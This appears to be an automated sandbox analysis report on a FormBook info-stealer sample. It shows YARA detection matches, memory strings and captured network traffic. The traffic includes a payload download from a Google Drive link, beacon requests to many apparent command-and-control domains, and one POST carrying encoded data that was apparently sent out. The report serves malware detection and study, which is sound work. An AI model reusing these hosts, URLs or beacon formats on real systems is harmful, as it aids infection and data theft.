Source: explorer.exe, 0000000A.00000000.2514664644.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2685356572.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2745951530.000000000D72B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2629488305.000000000D72B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comle
Source: wscript.exe, 00000009.00000002.6808220051.0000000005A82000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://wordpress.org
Source: wscript.exe, 00000009.00000002.6807746825.000000000575E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.aceadora.shop/i036/?k0GP1N2=KIxzD5HsRZBgKJlqtD/Z5Gj6Z8qoplCrxdfuDjJNx/1c9AJO6VXMMK
Source: wscript.exe, 00000009.00000002.6807520263.00000000055CC000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.automotiveparts-store.com/i036/?k0GP1N2=30w/opVeBRN2BD0
Source: wscript.exe, 00000009.00000003.2948460082.0000000007642000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2752741938.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2484091528.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2692683855.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2715744531.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2634643315.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2522098316.0000000010B3B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: wscript.exe, 00000009.00000002.6811526907.0000000007568000.00000004.00000800.00020000.00000000.sdmp, 752cuCH8.9.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/democratic-support-for-suprem0
Source: explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/graham-tries-t
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000A.00000000.2725466679.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2493103703.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2665887889.00000000054BC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2609887211.00000000054BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: wscript.exe, 00000009.00000002.6807181874.00000000052A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
Source: unknown HTTP traffic detected: POST /i036/ HTTP/1.1Host: www.005404.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.005404.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.005404.com/i036/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6b 30 47 50 31 4e 32 3d 28 6b 55 73 38 44 31 50 52 45 67 67 6f 4d 4e 42 75 4f 59 30 6a 6d 34 70 50 6c 6c 47 69 41 75 6d 36 44 58 46 55 7a 5a 42 52 70 46 33 4d 61 63 6f 75 39 36 4e 59 41 59 4a 51 58 77 51 37 76 4d 4d 6b 48 28 43 53 6c 36 6b 38 6b 57 55 75 59 74 76 38 42 55 30 36 37 49 44 71 72 45 6a 73 4a 41 6a 48 48 72 64 62 68 54 67 41 71 75 37 7e 74 32 54 6c 34 78 72 4b 43 6b 7a 6b 30 34 45 50 38 73 50 72 62 64 4c 44 78 54 77 78 77 36 67 6f 37 37 53 62 57 47 46 69 65 42 64 43 4c 35 65 33 33 6d 62 53 4a 55 62 77 38 64 2d 78 37 33 36 61 31 45 64 58 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: k0GP1N2=(kUs8D1PREggoMNBuOY0jm4pPllGiAum6DXFUzZBRpF3Macou96NYAYJQXwQ7vMMkH(CSl6k8kWUuYtv8BU067IDqrEjsJAjHHrdbhTgAqu7~t2Tl4xrKCkzk04EP8sPrbdLDxTwxw6go77SbWGFieBdCL5e33mbSJUbw8d-x736a1EdXg).
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1qheHL7syOTquXJBrnIXPI5VTgIglBp2J HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/fgrm3mfanvjaj0u9a81183n301jrfovr/1669627200000/00631903678986001080/*/1qheHL7syOTquXJBrnIXPI5VTgIglBp2J?e=download&uuid=90b6c944-d3c1-4975-9889-d409c9cc684d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-7s-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=yv3PuvLzWxpPEzbsw92WkcvntFSFr42Mhz+vE8sLITA0TeCZExOstoP49irgCfkKkles/RKXAXrXQmOnxmUvLiECiSxzmY5mCQ==&Rzu=hV1Pon HTTP/1.1Host: www.avatarworker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=ym8M/2tjPUpsy/4gmvkTuwE/MlV4j1mpuD/BZT5gSfNGNdlNobiMQCYFc1hZ19BTxGevG32o10SozpwTxQJqp+k2jOgcxoQgJQ==&Rzu=hV1Pon HTTP/1.1Host: www.005404.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=30w/opVeBRN2BD0+t0iebV3O91uD3hif00liGkW1avQDMr6jPs+779cXRQTACeXbG8r7UUT2eiCtxWYMbSEep+TmmGq/ExRAOQ==&Rzu=hV1Pon HTTP/1.1Host: www.automotiveparts-store.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=KIxzD5HsRZBgKJlqtD/Z5Gj6Z8qoplCrxdfuDjJNx/1c9AJO6VXMMK+63l9AWb1/ssE5X6NYSlv5byLnNWr+FpxZxtTvuFnXWw==&Rzu=hV1Pon HTTP/1.1Host: www.aceadora.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=DDTM8NTjTGQKNl9ZmiWQMqmzY5hUHu6DmELfmDs1vEv26+wpTDEFgWjPjGJv2unzSeE04u298BAHHYXe+vHUgcxZ13bZmjQmZA==&Rzu=hV1Pon HTTP/1.1Host: www.haveusstampsale.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=BZwpaihTGJGWcZJSAe2sxznsnPej0JxCYfoQvgCgbuMQP061bK/C39YT663oVlO5elykthEFB/Dcn8VFPsLzIGidWMmSTKgllQ==&Rzu=hV1Pon HTTP/1.1Host: www.xn--29-oj9ik7b890b.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=C2d71UQVeejWABy2lUSRL0f70CnRsZnWiEPbZ9IJ2qx2sLtfbvBuLRm7vEjCKtrH0IKHz9x/TFT4xXPEGBFmW1mbludPax5R3w==&Rzu=hV1Pon HTTP/1.1Host: www.gouldent.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=ronhS2NZk+RpAH8xyVeuvsbzfj1G+JCO7SbBJB6VTjQ5GvCPMYygorm2sXuQ6whLqX4zWjebsFwcRWcR3e6VRFoMUbeOjCqRvg==&Rzu=hV1Pon HTTP/1.1Host: www.rsvstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=Nt7we/gwvJafOenmPtqMdMQq0A5S+F0mCo2A/o6NNSBEDFrZxTdugE3hHqQHgmQnwi6pFnnhcgi6C1+qKckarzI1zqVfAVRktw==&Rzu=hV1Pon HTTP/1.1Host: www.techrocker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=LMIqSMdQ3q0mQ0O8E4Be7P+zrPM6Gg4aprrhhSoZXI8N9fokAeXZtK7CAx7jxtppbBVDda4uu0E3KjN/+XSSDpZJ6husVXmnlg==&Rzu=hV1Pon HTTP/1.1Host: www.youlian.fundConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=Ypm+0+Vc/krk+syJRkmS/ZXdqh86ue5y1szx5SRmlweqmqT2L40Pqi55gxfwp+7cpcP0UgmrVUc/vOiRo42zU0SjFnllzv841Q==&Rzu=hV1Pon HTTP/1.1Host: www.mangal20.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=gK12bHhqEy0e4Uj/ImUnYxfT+EkUqBjjVPatb5GnWKdwUy9sF2E4a2NySHYDGj5+R015BuqmsIpMnBRMM6PNmRTNIYpZBhLGAQ==&Rzu=hV1Pon HTTP/1.1Host: www.livinghopedoula.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=nUoi8bFrZKBgxi8j8+X6cHUsFDYNWYyZK5+gkPhwOd5YiI3qCsRWv9u9vhL8TMN6LbXPSZRgU6knpLXHXktn+vUZ7RewejrcRA==&Rzu=hV1Pon HTTP/1.1Host: www.planetthermo.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=yv3PuvLzWxpPEzbsw92WkcvntFSFr42Mhz+vE8sLITA0TeCZExOstoP49irgCfkKkles/RKXAXrXQmOnxmUvLiECiSxzmY5mCQ==&Rzu=hV1Pon HTTP/1.1Host: www.avatarworker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=ym8M/2tjPUpsy/4gmvkTuwE/MlV4j1mpuD/BZT5gSfNGNdlNobiMQCYFc1hZ19BTxGevG32o10SozpwTxQJqp+k2jOgcxoQgJQ==&Rzu=hV1Pon HTTP/1.1Host: www.005404.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=30w/opVeBRN2BD0+t0iebV3O91uD3hif00liGkW1avQDMr6jPs+779cXRQTACeXbG8r7UUT2eiCtxWYMbSEep+TmmGq/ExRAOQ==&Rzu=hV1Pon HTTP/1.1Host: www.automotiveparts-store.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=KIxzD5HsRZBgKJlqtD/Z5Gj6Z8qoplCrxdfuDjJNx/1c9AJO6VXMMK+63l9AWb1/ssE5X6NYSlv5byLnNWr+FpxZxtTvuFnXWw==&Rzu=hV1Pon HTTP/1.1Host: www.aceadora.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=DDTM8NTjTGQKNl9ZmiWQMqmzY5hUHu6DmELfmDs1vEv26+wpTDEFgWjPjGJv2unzSeE04u298BAHHYXe+vHUgcxZ13bZmjQmZA==&Rzu=hV1Pon HTTP/1.1Host: www.haveusstampsale.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i036/?k0GP1N2=BZwpaihTGJGWcZJSAe2sxznsnPej0JxCYfoQvgCgbuMQP061bK/C39YT663oVlO5elykthEFB/Dcn8VFPsLzIGidWMmSTKgllQ==&Rzu=hV1Pon HTTP/1.1Host: www.xn--29-oj9ik7b890b.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49811 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 2_2_00405050

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2252030385.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2297348771.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6797344913.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2257617609.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6788894111.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6797910389.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000000.2252030385.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.2252030385.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.2252030385.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2297348771.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2297348771.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2297348771.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.6797344913.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.6797344913.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.6797344913.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000000.2257617609.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.2257617609.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.2257617609.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.6788894111.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.6788894111.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.6788894111.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.6797910389.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.6797910389.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.6797910389.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Lakeringernes (1).exe PID: 384, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: wscript.exe PID: 3316, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: Lakeringernes (1).exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000000.2252030385.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.2252030385.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.2252030385.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2297348771.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2297348771.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2297348771.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.6797344913.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.6797344913.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.6797344913.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000000.2257617609.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.2257617609.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.2257617609.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.6788894111.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.6788894111.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.6788894111.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.6797910389.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.6797910389.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
